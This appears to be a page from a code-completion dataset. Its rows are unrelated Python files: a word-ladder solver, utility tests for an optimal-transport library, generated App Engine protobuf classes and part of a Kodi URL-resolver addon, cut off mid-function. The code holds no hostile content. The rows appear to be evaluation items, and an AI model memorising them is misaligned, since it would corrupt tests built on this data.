gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
# -*- coding: utf-8 -*-
"""
word_ladder_2.py
~~~~~~~~~~~~~~
A brief description goes here.
"""
import copy
class Solution:
# @param start, a string
# @param end, a string
# @param dictionary, a set of string
# @return a list of lists of string
MAX_EDGE_VALUE = 9999
def findLadders(self, start, end, dictionary):
Solution.access_cache = {}
return self.shortest_path(start, end, dictionary)
#return self.breath_first_search(start, end, dictionary)
def can_access(self, a, b):
diff = 0
i = 0
try:
while i < len(a):
if a[i] != b[i]:
diff += 1
if diff >= 2:
return False
i += 1
except:
raise
return True
def iterate_character(self, current, dict_set, visited_set):
s1 = set()
for i in range(len(current)):
for j in range(1, 26):
new_word = current[0:i] +\
chr((ord(current[i]) - ord('a') + j) % 26 + ord('a')) + current[i+1:]
s1.add(new_word)
s = s1.intersection(dict_set) - visited_set
return s
def get_possible_changes(self, current, dictionary):
if Solution.access_cache.has_key(current):
return Solution.access_cache[current]
def iterate_all_possibility():
s = set()
for i in dictionary:
if current != i and self.can_access(current, i):
s.add(i)
return s
#s = iterate_character()
s = iterate_all_possibility()
Solution.access_cache[current] = copy.copy(s)
return s
def get_edges(self, start, end, dictionary):
d = set(copy.copy(dictionary))
d.add(start)
d.add(end)
edges = {}
for i in d: # optimization, uniformed initialization
edges[i] = {}
dict_set = set(dictionary)
visited_set = set()
for i in d:
iterable_words = self.iterate_character(i, dict_set, visited_set)
for j in iterable_words:
edges[i][j] = 1
edges[j][i] = 1
visited_set.add(i)
return edges
def shortest_path(self, start, end, dictionary):
def get_min_edge(verticles, shortest_paths):
min_value = Solution.MAX_EDGE_VALUE
min_verticle = None
for i in verticles:
if shortest_paths.has_key(i) and shortest_paths[i]['value'] < min_value:
min_value = shortest_paths[i]['value']
min_verticle = i
return min_verticle
def get_all_paths(end, paths):
whole_paths = [[end]]
result = []
while whole_paths:
path = whole_paths.pop()
proceed = path[-1]
if shortest_paths[proceed].has_key('previous'):
for i in shortest_paths[proceed]['previous']:
l = copy.copy(path)
l.append(i)
whole_paths.append(l)
else:
path.append(start)
path.reverse()
result.append(path)
return result
edges = self.get_edges(start, end, dictionary)
if not start in edges:
return []
shortest_paths = {}
for i in edges[start]:
shortest_paths[i] = {
'value': edges[start][i]
}
unresolved_verticles = set(dictionary)
unresolved_verticles.add(end)
while unresolved_verticles:
current_min_verticle = get_min_edge(unresolved_verticles, shortest_paths)
if current_min_verticle == end: # if the end is specified, bread directly
break
elif current_min_verticle == None:
print shortest_paths, unresolved_verticles
print Solution.access_cache
return []
unresolved_verticles.remove(current_min_verticle)
for destination in edges[current_min_verticle]:
new_path_value = shortest_paths[current_min_verticle]['value'] + edges[current_min_verticle][destination]
if not shortest_paths.has_key(destination):
shortest_paths[destination] = {
'value': new_path_value,
'previous': [current_min_verticle],
}
else:
if new_path_value < shortest_paths[destination]['value']:
shortest_paths[destination] = {
'value': new_path_value,
'previous': [current_min_verticle],
}
elif new_path_value == shortest_paths[destination]['value']:
shortest_paths[destination]['previous'].append(current_min_verticle)
paths = get_all_paths(end, shortest_paths)
return paths
def breath_first_search(self, start, end, dictionary):
max_path_len = len(dictionary)
i = 1
while i<=max_path_len:
print 'trying %i...' % i
paths = self.depth_first_search(i, start, end, dictionary)
if paths:
return paths
else:
i += 1
return []
def get_current_possible_changes(self, current, dictionary, tried):
s = self.get_possible_changes(current, dictionary)
result = s - set(tried)
return result
def depth_first_search(self, max_depth, start, end, dictionary):
stack = [start]
result = []
state = []
tried = set()
while stack:
try:
current = stack[-1]
state.append(current)
if len(state) == max_depth: # final chance
if self.can_access(current, end):
result.append(copy.copy(state))
while stack and state and stack[-1] == state[-1]:
stack.pop()
state.pop()
else:
available_nodes = self.get_current_possible_changes(current, dictionary, state)
if available_nodes:
for i in available_nodes:
stack.append(i)
else: # backtracking
while stack and state and stack[-1] == state[-1]:
stack.pop()
state.pop()
except:
print "state=%s\ntried=%s\nresult=%s" % (state, tried, result)
raise
return result
def _main(argv):
    """Smoke-test findLadders on a few fixtures, timing each run.

    :param argv: command-line arguments (unused).
    """
    import time
    solver = Solution()
    datas = [["hit", "cog", ["hot", "dot", "dog", "lot", "log"]],
             ["a", "c", ["a", "b", "c"]],
             ["hot", "dog", ["hot", "dog"]],
             ["hit", "cog", ["hot", "cog", "dot", "dog", "hit", "lot", "log"]],
             ]
    for start, end, words in datas:
        begin = time.time()
        print(start, end, len(words))
        print(solver.findLadders(start, end, words))
        # Fresh name: the original rebound `end`, shadowing the loop variable.
        print(time.time() - begin)


if __name__ == '__main__':
    import sys
    _main(sys.argv)
| |
"""Tests for module utils for timing and parallel computation """
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import ot
import numpy as np
import sys
def test_parmap():
    """ot.utils.parmap must reproduce the results of the builtin map."""
    n = 100

    def square(i):
        return 1.0 * i * i

    values = np.arange(n)
    expected = [square(v) for v in values]
    parallel = list(ot.utils.parmap(square, values))
    np.testing.assert_allclose(expected, parallel)
def test_tic_toc():
    """tic/toc measure a sleep within tolerance; toq agrees with toc."""
    import time

    ot.tic()
    time.sleep(0.5)
    elapsed = ot.toc()
    requeried = ot.toq()
    # the measured duration is close to the sleep time
    np.testing.assert_allclose(0.5, elapsed, rtol=1e-2, atol=1e-2)
    # toq reports the same interval that toc returned
    np.testing.assert_allclose(elapsed, requeried, rtol=1e-2, atol=1e-2)
def test_kernel():
    """The Gaussian kernel of a set with itself has a unit diagonal."""
    n = 100
    samples = np.random.randn(n, 2)
    gram = ot.utils.kernel(samples, samples)
    np.testing.assert_allclose(np.diag(gram), np.ones(n))
def test_unif():
    """ot.unif returns a histogram whose mass sums to one."""
    n = 100
    weights = ot.unif(n)
    np.testing.assert_allclose(1, np.sum(weights))
def test_dist():
    """ot.dist should default to the squared Euclidean metric."""
    n = 100
    x = np.random.randn(n, 2)
    # reference: explicit pairwise squared distances
    reference = np.zeros((n, n))
    for i in range(n):
        for j in range(n):
            reference[i, j] = np.sum(np.square(x[i, :] - x[j, :]))
    # both the two-argument and one-argument forms must match
    np.testing.assert_allclose(reference, ot.dist(x, x))
    np.testing.assert_allclose(reference, ot.dist(x))
def test_dist0():
    """dist0 defaults to linear sampling with a quadratic ground cost."""
    n = 100
    cost = ot.utils.dist0(n, method='lin_square')
    # corner entry equals the squared index distance between the endpoints
    np.testing.assert_allclose(cost[0, -1], (n - 1) * (n - 1))
def test_dots():
    """dots(A, B, C) chains matrix products like A.dot(B.dot(C))."""
    n1, n2, n3, n4 = 100, 50, 200, 100
    A = np.random.randn(n1, n2)
    B = np.random.randn(n2, n3)
    C = np.random.randn(n3, n4)
    chained = ot.utils.dots(A, B, C)
    reference = A.dot(B.dot(C))
    np.testing.assert_allclose(chained, reference)
def test_clean_zeros():
    """clean_zeros drops entries whose marginal weight is exactly zero."""
    n = 100
    nz = 50
    nz2 = 20
    # first marginal: zero out the first nz bins, then renormalise
    u1 = ot.unif(n)
    u1[:nz] = 0
    u1 = u1 / u1.sum()
    # second marginal: zero out the first nz2 bins, then renormalise
    u2 = ot.unif(n)
    u2[:nz2] = 0
    u2 = u2 / u2.sum()
    cost = ot.utils.dist0(n)
    a, b, _ = ot.utils.clean_zeros(u1, u2, cost)
    assert len(a) == n - nz
    assert len(b) == n - nz2
def test_gpu_fun():
    """Placeholder smoke test: only exercises a dense numpy reduction."""
    n = 100
    ones = np.ones((n, n))
    ones.sum()
def test_cost_normalization():
    """cost_normalization supports identity, median, max, log and loglog."""
    C = np.random.rand(10, 10)
    # default: the matrix comes back unchanged
    np.testing.assert_allclose(C, ot.utils.cost_normalization(C))
    # 'median': rescaled so the median cost is 1
    M = ot.utils.cost_normalization(C, 'median')
    np.testing.assert_allclose(np.median(M), 1)
    # 'max': rescaled so the largest cost is 1
    M = ot.utils.cost_normalization(C, 'max')
    np.testing.assert_allclose(M.max(), 1)
    # 'log': log(1 + C)
    M = ot.utils.cost_normalization(C, 'log')
    np.testing.assert_allclose(M.max(), np.log(1 + C).max())
    # 'loglog': log(1 + log(1 + C))
    M = ot.utils.cost_normalization(C, 'loglog')
    np.testing.assert_allclose(M.max(), np.log(1 + np.log(1 + C)).max())
def test_check_params():
    """check_params is True only when no keyword argument is None."""
    assert ot.utils.check_params(first='OK', second=20) is True
    assert ot.utils.check_params(first='OK', second=None) is False
def test_deprecated_func():
    """ot.utils.deprecated must mark functions/classes so that
    ot.utils._is_deprecated can detect the mark (Python >= 3.5 only)."""
    @ot.utils.deprecated('deprecated text for fun')
    def fun():
        pass
    # control case: an undecorated function must not be flagged
    def fun2():
        pass
    @ot.utils.deprecated('deprecated text for class')
    class Class():
        pass
    # _is_deprecated relies on inspect.signature features from 3.5+
    if sys.version_info < (3, 5):
        print('Not tested')
    else:
        assert ot.utils._is_deprecated(fun) is True
        assert ot.utils._is_deprecated(fun2) is False
def test_BaseEstimator():
    """get_params/set_params round-trip on a BaseEstimator subclass."""
    class Demo(ot.utils.BaseEstimator):
        def __init__(self, first='spam', second='eggs'):
            self.first = first
            self.second = second

    est = Demo()
    # parameter discovery is driven by the __init__ signature
    names = est._get_param_names()
    assert 'first' in names
    assert 'second' in names
    params = est.get_params()
    assert 'first' in params
    assert 'second' in params
    # set_params writes the values back onto the instance
    params['first'] = 'spam again'
    est.set_params(**params)
    assert est.first == 'spam again'
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
class CapabilityConfigList(ProtocolBuffer.ProtocolMessage):
  """Generated protobuf message: repeated `config` (CapabilityConfig, tag 1)
  plus an optional `default_config` (CapabilityConfig, tag 2).

  NOTE(review): machine-generated serialization code -- logic left untouched.
  """
  # Presence flag and lazily-created storage for default_config.
  has_default_config_ = 0
  default_config_ = None

  def __init__(self, contents=None):
    # contents: optional serialized bytes to initialize the message from.
    self.config_ = []
    # Guards the lazy construction of default_config_ across threads.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  # --- accessors for the repeated `config` field ---
  def config_size(self): return len(self.config_)

  def config_list(self): return self.config_

  def config(self, i):
    return self.config_[i]

  def mutable_config(self, i):
    return self.config_[i]

  def add_config(self):
    # Appends a new empty CapabilityConfig and returns it for mutation.
    x = CapabilityConfig()
    self.config_.append(x)
    return x

  def clear_config(self):
    self.config_ = []

  # --- accessors for the optional `default_config` field ---
  def default_config(self):
    # Lazy creation with double-checked locking so two threads cannot
    # build the submessage twice.
    if self.default_config_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.default_config_ is None: self.default_config_ = CapabilityConfig()
      finally:
        self.lazy_init_lock_.release()
    return self.default_config_

  def mutable_default_config(self): self.has_default_config_ = 1; return self.default_config()

  def clear_default_config(self):
    # Clears (and reuses) the existing submessage rather than dropping it.
    if self.has_default_config_:
      self.has_default_config_ = 0;
      if self.default_config_ is not None: self.default_config_.Clear()

  def has_default_config(self): return self.has_default_config_

  def MergeFrom(self, x):
    # Field-wise merge from another CapabilityConfigList.
    assert x is not self
    for i in xrange(x.config_size()): self.add_config().CopyFrom(x.config(i))
    if (x.has_default_config()): self.mutable_default_config().MergeFrom(x.default_config())

  def Equals(self, x):
    # Structural equality; 1/0 return values per generated-code convention.
    if x is self: return 1
    if len(self.config_) != len(x.config_): return 0
    for e1, e2 in zip(self.config_, x.config_):
      if e1 != e2: return 0
    if self.has_default_config_ != x.has_default_config_: return 0
    if self.has_default_config_ and self.default_config_ != x.default_config_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # The list is initialized only when every contained message is.
    initialized = 1
    for p in self.config_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_default_config_ and not self.default_config_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # One tag byte per field occurrence plus length-prefixed payloads.
    n = 0
    n += 1 * len(self.config_)
    for i in xrange(len(self.config_)): n += self.lengthString(self.config_[i].ByteSize())
    if (self.has_default_config_): n += 1 + self.lengthString(self.default_config_.ByteSize())
    return n + 0

  def Clear(self):
    self.clear_config()
    self.clear_default_config()

  def OutputUnchecked(self, out):
    # Wire tags: 10 = (field 1 << 3) | LENGTH_DELIMITED, 18 = field 2.
    for i in xrange(len(self.config_)):
      out.putVarInt32(10)
      out.putVarInt32(self.config_[i].ByteSize())
      self.config_[i].OutputUnchecked(out)
    if (self.has_default_config_):
      out.putVarInt32(18)
      out.putVarInt32(self.default_config_.ByteSize())
      self.default_config_.OutputUnchecked(out)

  def TryMerge(self, d):
    # Decode fields until the buffer is exhausted; unknown tags are skipped.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_config().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_default_config().TryMerge(tmp)
        continue
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)

  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable text-format dump of the message.
    res=""
    cnt=0
    for e in self.config_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("config%s <\n" % elm)
      res+=e.__str__(prefix + " ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_default_config_:
      res+=prefix+"default_config <\n"
      res+=self.default_config_.__str__(prefix + " ", printElemNumber)
      res+=prefix+">\n"
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field numbers and tag lookup tables used by the text formatter.
  kconfig = 1
  kdefault_config = 2

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "config",
    2: "default_config",
  }, 2)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
  }, 2, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
class CapabilityConfig(ProtocolBuffer.ProtocolMessage):
  """Generated protobuf message describing one capability's state.

  Required fields: package (tag 1), capability (tag 2). Optional: status
  (tag 3, defaults to UNKNOWN), internal_message (4), admin_message (5),
  error_message (6), scheduled_time (7).

  NOTE(review): machine-generated serialization code -- logic left untouched.
  """
  # Status enum values.
  ENABLED = 1
  SCHEDULED = 2
  DISABLED = 3
  UNKNOWN = 4

  _Status_NAMES = {
    1: "ENABLED",
    2: "SCHEDULED",
    3: "DISABLED",
    4: "UNKNOWN",
  }

  def Status_Name(cls, x): return cls._Status_NAMES.get(x, "")
  Status_Name = classmethod(Status_Name)

  # Presence flags and default values for every field.
  has_package_ = 0
  package_ = ""
  has_capability_ = 0
  capability_ = ""
  has_status_ = 0
  status_ = 4
  has_scheduled_time_ = 0
  scheduled_time_ = ""
  has_internal_message_ = 0
  internal_message_ = ""
  has_admin_message_ = 0
  admin_message_ = ""
  has_error_message_ = 0
  error_message_ = ""

  def __init__(self, contents=None):
    # contents: optional serialized bytes to initialize the message from.
    if contents is not None: self.MergeFromString(contents)

  # --- package (required, tag 1) ---
  def package(self): return self.package_

  def set_package(self, x):
    self.has_package_ = 1
    self.package_ = x

  def clear_package(self):
    if self.has_package_:
      self.has_package_ = 0
      self.package_ = ""

  def has_package(self): return self.has_package_

  # --- capability (required, tag 2) ---
  def capability(self): return self.capability_

  def set_capability(self, x):
    self.has_capability_ = 1
    self.capability_ = x

  def clear_capability(self):
    if self.has_capability_:
      self.has_capability_ = 0
      self.capability_ = ""

  def has_capability(self): return self.has_capability_

  # --- status (optional enum, tag 3; default UNKNOWN=4) ---
  def status(self): return self.status_

  def set_status(self, x):
    self.has_status_ = 1
    self.status_ = x

  def clear_status(self):
    if self.has_status_:
      self.has_status_ = 0
      self.status_ = 4

  def has_status(self): return self.has_status_

  # --- scheduled_time (optional, tag 7) ---
  def scheduled_time(self): return self.scheduled_time_

  def set_scheduled_time(self, x):
    self.has_scheduled_time_ = 1
    self.scheduled_time_ = x

  def clear_scheduled_time(self):
    if self.has_scheduled_time_:
      self.has_scheduled_time_ = 0
      self.scheduled_time_ = ""

  def has_scheduled_time(self): return self.has_scheduled_time_

  # --- internal_message (optional, tag 4) ---
  def internal_message(self): return self.internal_message_

  def set_internal_message(self, x):
    self.has_internal_message_ = 1
    self.internal_message_ = x

  def clear_internal_message(self):
    if self.has_internal_message_:
      self.has_internal_message_ = 0
      self.internal_message_ = ""

  def has_internal_message(self): return self.has_internal_message_

  # --- admin_message (optional, tag 5) ---
  def admin_message(self): return self.admin_message_

  def set_admin_message(self, x):
    self.has_admin_message_ = 1
    self.admin_message_ = x

  def clear_admin_message(self):
    if self.has_admin_message_:
      self.has_admin_message_ = 0
      self.admin_message_ = ""

  def has_admin_message(self): return self.has_admin_message_

  # --- error_message (optional, tag 6) ---
  def error_message(self): return self.error_message_

  def set_error_message(self, x):
    self.has_error_message_ = 1
    self.error_message_ = x

  def clear_error_message(self):
    if self.has_error_message_:
      self.has_error_message_ = 0
      self.error_message_ = ""

  def has_error_message(self): return self.has_error_message_

  def MergeFrom(self, x):
    # Field-wise merge: set-fields of x overwrite this message's fields.
    assert x is not self
    if (x.has_package()): self.set_package(x.package())
    if (x.has_capability()): self.set_capability(x.capability())
    if (x.has_status()): self.set_status(x.status())
    if (x.has_scheduled_time()): self.set_scheduled_time(x.scheduled_time())
    if (x.has_internal_message()): self.set_internal_message(x.internal_message())
    if (x.has_admin_message()): self.set_admin_message(x.admin_message())
    if (x.has_error_message()): self.set_error_message(x.error_message())

  def Equals(self, x):
    # Structural equality; both presence flag and value must agree.
    if x is self: return 1
    if self.has_package_ != x.has_package_: return 0
    if self.has_package_ and self.package_ != x.package_: return 0
    if self.has_capability_ != x.has_capability_: return 0
    if self.has_capability_ and self.capability_ != x.capability_: return 0
    if self.has_status_ != x.has_status_: return 0
    if self.has_status_ and self.status_ != x.status_: return 0
    if self.has_scheduled_time_ != x.has_scheduled_time_: return 0
    if self.has_scheduled_time_ and self.scheduled_time_ != x.scheduled_time_: return 0
    if self.has_internal_message_ != x.has_internal_message_: return 0
    if self.has_internal_message_ and self.internal_message_ != x.internal_message_: return 0
    if self.has_admin_message_ != x.has_admin_message_: return 0
    if self.has_admin_message_ and self.admin_message_ != x.admin_message_: return 0
    if self.has_error_message_ != x.has_error_message_: return 0
    if self.has_error_message_ and self.error_message_ != x.error_message_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # Both required fields (package, capability) must be present.
    initialized = 1
    if (not self.has_package_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: package not set.')
    if (not self.has_capability_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: capability not set.')
    return initialized

  def ByteSize(self):
    # Trailing "+ 2" accounts for the two required fields' tag bytes.
    n = 0
    n += self.lengthString(len(self.package_))
    n += self.lengthString(len(self.capability_))
    if (self.has_status_): n += 1 + self.lengthVarInt64(self.status_)
    if (self.has_scheduled_time_): n += 1 + self.lengthString(len(self.scheduled_time_))
    if (self.has_internal_message_): n += 1 + self.lengthString(len(self.internal_message_))
    if (self.has_admin_message_): n += 1 + self.lengthString(len(self.admin_message_))
    if (self.has_error_message_): n += 1 + self.lengthString(len(self.error_message_))
    return n + 2

  def Clear(self):
    self.clear_package()
    self.clear_capability()
    self.clear_status()
    self.clear_scheduled_time()
    self.clear_internal_message()
    self.clear_admin_message()
    self.clear_error_message()

  def OutputUnchecked(self, out):
    # Wire tags: 10/18 strings (fields 1,2), 24 varint (field 3),
    # 34/42/50/58 strings (fields 4,5,6,7).
    out.putVarInt32(10)
    out.putPrefixedString(self.package_)
    out.putVarInt32(18)
    out.putPrefixedString(self.capability_)
    if (self.has_status_):
      out.putVarInt32(24)
      out.putVarInt32(self.status_)
    if (self.has_internal_message_):
      out.putVarInt32(34)
      out.putPrefixedString(self.internal_message_)
    if (self.has_admin_message_):
      out.putVarInt32(42)
      out.putPrefixedString(self.admin_message_)
    if (self.has_error_message_):
      out.putVarInt32(50)
      out.putPrefixedString(self.error_message_)
    if (self.has_scheduled_time_):
      out.putVarInt32(58)
      out.putPrefixedString(self.scheduled_time_)

  def TryMerge(self, d):
    # Decode fields until the buffer is exhausted; unknown tags are skipped.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_package(d.getPrefixedString())
        continue
      if tt == 18:
        self.set_capability(d.getPrefixedString())
        continue
      if tt == 24:
        self.set_status(d.getVarInt32())
        continue
      if tt == 34:
        self.set_internal_message(d.getPrefixedString())
        continue
      if tt == 42:
        self.set_admin_message(d.getPrefixedString())
        continue
      if tt == 50:
        self.set_error_message(d.getPrefixedString())
        continue
      if tt == 58:
        self.set_scheduled_time(d.getPrefixedString())
        continue
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)

  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable text-format dump of the message.
    res=""
    if self.has_package_: res+=prefix+("package: %s\n" % self.DebugFormatString(self.package_))
    if self.has_capability_: res+=prefix+("capability: %s\n" % self.DebugFormatString(self.capability_))
    if self.has_status_: res+=prefix+("status: %s\n" % self.DebugFormatInt32(self.status_))
    if self.has_scheduled_time_: res+=prefix+("scheduled_time: %s\n" % self.DebugFormatString(self.scheduled_time_))
    if self.has_internal_message_: res+=prefix+("internal_message: %s\n" % self.DebugFormatString(self.internal_message_))
    if self.has_admin_message_: res+=prefix+("admin_message: %s\n" % self.DebugFormatString(self.admin_message_))
    if self.has_error_message_: res+=prefix+("error_message: %s\n" % self.DebugFormatString(self.error_message_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field numbers and tag lookup tables used by the text formatter.
  kpackage = 1
  kcapability = 2
  kstatus = 3
  kscheduled_time = 7
  kinternal_message = 4
  kadmin_message = 5
  kerror_message = 6

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "package",
    2: "capability",
    3: "status",
    4: "internal_message",
    5: "admin_message",
    6: "error_message",
    7: "scheduled_time",
  }, 7)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.STRING,
    7: ProtocolBuffer.Encoder.STRING,
  }, 7, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""

# Public API of this generated module.
__all__ = ['CapabilityConfigList','CapabilityConfig']
| |
# -*- coding: utf-8 -*-
"""
URLResolver Addon for Kodi
Copyright (C) 2016 t0mm0, tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
'''
This module provides the main API for accessing the urlresolver features.
For most cases you probably want to use :func:`urlresolver.resolve` or
:func:`urlresolver.choose_source`.
.. seealso::
:class:`HostedMediaFile`
'''
import re
import urlparse
import sys
import os
import xbmcgui
import common
import xml.dom.minidom
from hmf import HostedMediaFile
from urlresolver9.resolver import UrlResolver
from plugins import *
# Announce the addon version as soon as this module is imported.
common.log_utils.log_notice('Initializing URLResolver version: %s' % (common.addon_version))
# Maximum number of setting lines per category page when rewriting settings.xml.
MAX_SETTINGS = 75
# Extra directories registered via add_plugin_dirs() to scan for plugins.
PLUGIN_DIRS = []
# Cache of hostname -> validation result used by scrape_supported().
host_cache = {}
# Terrible hack to allow hmf to set a global var to stop pop-ups for all resolvers during resolve()
ALLOW_POPUPS = True
def add_plugin_dirs(dirs):
    """Register extra plugin search paths.

    Accepts either a single path string or an iterable of paths; both are
    appended to the module-level PLUGIN_DIRS list in place.
    """
    global PLUGIN_DIRS
    if isinstance(dirs, basestring):
        PLUGIN_DIRS.append(dirs)
    else:
        PLUGIN_DIRS.extend(dirs)
def load_external_plugins():
    """Import every .py module found in the registered PLUGIN_DIRS and
    publish it in sys.modules so its resolver classes get registered."""
    for plugin_dir in PLUGIN_DIRS:
        common.log_utils.log_debug('Adding plugin path: %s' % (plugin_dir))
        sys.path.insert(0, plugin_dir)
        for filename in os.listdir(plugin_dir):
            # skip dunder files (__init__ etc.) and non-Python files
            if filename.startswith('__') or not filename.endswith('.py'):
                continue
            mod_name = filename[:-3]
            imp = __import__(mod_name, globals(), locals())
            sys.modules[mod_name] = imp
            common.log_utils.log_debug('Loaded %s as %s from %s' % (imp, mod_name, filename))
def relevant_resolvers(domain=None, include_universal=None, include_external=False, include_disabled=False, order_matters=False):
    """Return the resolver classes applicable to `domain`.

    Filters UrlResolver subclasses by enabled state, universality and
    domain match; optionally loads external plugins first and sorts the
    result by resolver priority.
    """
    if include_external:
        load_external_plugins()
    if isinstance(domain, basestring):
        domain = domain.lower()
    if include_universal is None:
        include_universal = common.get_setting('allow_universal') == "true"
    classes = UrlResolver.__class__.__subclasses__(UrlResolver)
    relevant = []
    for resolver in classes:
        # guard clauses replace the original nested ifs
        if not (include_disabled or resolver._is_enabled()):
            continue
        if resolver.isUniversal() and not include_universal:
            continue
        matches = (domain is None
                   or (domain and any(domain in res_domain.lower() for res_domain in resolver.domains))
                   or '*' in resolver.domains)
        if matches:
            relevant.append(resolver)
    if order_matters:
        relevant.sort(key=lambda r: r._get_priority())
    common.log_utils.log_debug('Relevant Resolvers: %s' % (relevant))
    return relevant
def resolve(web_url):
    '''
    Resolve a web page to a direct media stream URL.

    Behind the scenes each available resolver plugin is checked in priority
    order (lowest priority number first); the first one willing to handle
    ``web_url`` resolves it.

    .. seealso::
        :class:`HostedMediaFile`

    Args:
        web_url (str): A URL to a web page associated with a piece of media
        content.

    Returns:
        If the ``web_url`` could be resolved, a string containing the direct
        URL to the media file, if not, returns ``False``.
    '''
    return HostedMediaFile(url=web_url).resolve()
def filter_source_list(source_list):
    '''
    Drop every entry that no resolver plugin can handle.

    Args:
        source_list (list of :class:`HostedMediaFile`): candidate web pages
        thought to be associated with media content.

    Returns:
        The same list with every falsy (unresolvable) entry removed.
    '''
    return [candidate for candidate in source_list if candidate]
def choose_source(sources):
    '''
    Pick one playable :class:`HostedMediaFile` out of ``sources``.

    Unresolvable entries are filtered out first. With no playable stream the
    function returns ``False``; with exactly one it is returned directly;
    with several, a selection dialog is shown to the user.

    Args:
        sources (list): A list of :class:`HostedMediaFile` representing web
        pages that are thought to be associated with media content.

    Returns:
        The chosen :class:`HostedMediaFile` or ``False`` if the dialog is
        cancelled or none of the :class:`HostedMediaFile` are resolvable.
    '''
    sources = filter_source_list(sources)
    if not sources:
        common.log_utils.log_warning('no playable streams found')
        return False
    if len(sources) == 1:
        return sources[0]
    # several candidates: let the user decide
    dialog = xbmcgui.Dialog()
    index = dialog.select('Choose your stream', [source.title for source in sources])
    return sources[index] if index > -1 else False
def scrape_supported(html, regex=None, host_only=False):
    '''
    Return the links in ``html`` that urlresolver can resolve.

    args:
        html: the html to be scraped
        regex: an optional argument to override the default href-extracting
        pattern
        host_only: an optional argument if true to do only host validation vs
        full url validation (default False)

    Returns:
        a list of links scraped from the html that passed validation
    '''
    # Raw string: ``\s`` in a plain literal is an invalid escape sequence
    # (DeprecationWarning/SyntaxWarning in modern Python).
    if regex is None:
        regex = r'''href\s*=\s*['"]([^'"]+)'''
    links = []
    for match in re.finditer(regex, html):
        stream_url = match.group(1)
        host = urlparse.urlparse(stream_url).hostname
        if host_only:
            if host is None:
                continue
            # cached verdict for this host avoids re-validating it
            if host in host_cache:
                if host_cache[host]:
                    links.append(stream_url)
                continue
            # use dummy media_id to allow host validation
            hmf = HostedMediaFile(host=host, media_id='dummy')
        else:
            hmf = HostedMediaFile(url=stream_url)
        is_valid = hmf.valid_url()
        host_cache[host] = is_valid
        if is_valid:
            links.append(stream_url)
    return links
def display_settings():
    '''
    Open the settings dialog for :mod:`urlresolver` and its plugins, after
    regenerating the settings XML.

    .. note::
        All changes made to these setting by the user are global and will
        affect any addon that uses :mod:`urlresolver` and its plugins.
    '''
    _update_settings_xml()
    common.open_settings()
def _update_settings_xml():
    # NOTE(review): this immediate return deliberately disables the rewrite
    # below -- everything after it is intentionally dead code, kept for
    # reference (see the commented-out call at the bottom of the module).
    return
    '''
    This function writes a new ``resources/settings.xml`` file which contains
    all settings for this addon and its plugins.
    '''
    # Ensure the settings directory exists; ignore "already exists".
    try:
        os.makedirs(os.path.dirname(common.settings_file))
    except OSError:
        pass
    # Static header plus the global URLResolver category.
    new_xml = [
        '<?xml version="1.0" encoding="utf-8" standalone="yes"?>',
        '<settings>',
